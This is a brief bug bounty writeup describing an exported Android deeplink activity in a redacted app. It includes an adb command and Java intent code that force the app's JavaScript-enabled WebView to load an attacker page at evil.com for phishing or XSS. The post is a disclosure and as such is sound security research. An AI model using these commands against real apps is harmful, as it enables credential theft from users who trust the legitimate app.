Phishing in Android

PublishedMay 3, 2023

•1 min read

The app can be launched by any other app because its deeplink activity is exported=true.

Adb exploit

adb shell am start -a android.intent.action.VIEW -n com.redacted.android/"com.redacted.activities.DeepLinkActivity" -d "https://evil.com"

Apk Exploit

Intent intent = new Intent();       intent.setClassName("com.redacted.android","com.redcated.android.activities.DeepLinkActivity");
intent.setData(Uri.parse("https://evil.com"));
startActivity(intent);

Impact

The attcker can craft a phishing page and grab the credentails. or can launch a xss attack because the webview has javascriptenabled(true). Most of the case the victim believe it as an legitimate url because it is loading in legititmate vulnerable app

#bugbounty

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

How a Simple Firebase Misuse Can Lock Out Users From Signing Up

In the world of user authentication, ensuring that email addresses are properly validated and managed is crucial. But what happens when an attacker can abuse a third-party authentication system to "reserve" someone else's email, effectively blocking ...

Apr 8, 20252 min read

The Curious Case lof Hidden Phone Number Change & POST-to-GET CSRF — A Hacker’s Tale with a twist

Introduction Sometimes, the most interesting vulnerabilities aren’t the flashy ones — they’re the sneaky, almost accidental bugs that show just how broken the logic behind a system can be. This is one such story where a "simple" password change page ...

Mar 31, 20253 min read

💸 "65 Euros for an Account Deletion Fail — When Deleted Doesn’t Mean Deleted"

The Bug I found a weird issue with the platform’s account deletion flow: When a user deletes their account, their added email addresses were not removed from the system. If the user tried to sign up again using the same email, they couldn’t — the s...

Mar 31, 20251 min read

🔥 Account Takeover via Duplicate Registration — A 1500 Euro Jackpot

The Bug Found a critical account takeover in a web application’s registration flow.The platform allowed creating the same account (same email) from a different session, even though the account already existed. Step-by-Step PoC Create account with em...

Mar 31, 20251 min read

the security guy

10 posts

bugbounty finding writeups.

Command Palette

Adb exploit

Apk Exploit

Impact

Comments

More from this blog